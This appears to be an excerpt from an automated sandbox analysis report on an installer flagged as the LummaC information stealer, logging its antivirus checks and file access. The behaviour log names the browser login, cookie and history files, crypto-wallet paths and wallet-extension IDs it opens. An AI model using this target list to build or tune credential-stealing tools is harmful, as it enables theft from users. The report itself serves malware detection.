Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\2264c7d1 VolumeInformation

Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe

Code function: 36_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

36_2_00491486

Source: C:\Users\user\Desktop\Full_Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Full_Setup.exe, Full_Setup.exe, 00000000.00000003.1887667498.0000000000895000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: find.exe, 0000001B.00000002.2417189025.000001D60B3CB000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000001B.00000002.2417259965.000001D60B640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgui.exe

Source: C:\Users\user\Desktop\Full_Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Full_Setup.exe PID: 7048, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Full_Setup.exe	String found in binary or memory: llets/Electrum-LTC
Source: Full_Setup.exe	String found in binary or memory: ElectronCash
Source: Full_Setup.exe	String found in binary or memory: Wallets/JAXX New Version
Source: Full_Setup.exe	String found in binary or memory: window-state.json
Source: Full_Setup.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Full_Setup.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Full_Setup.exe	String found in binary or memory: Wallets/Ethereum
Source: Full_Setup.exe, 00000000.00000003.1876798101.00000000008F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Full_Setup.exe, 00000000.00000003.1876798101.00000000008F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
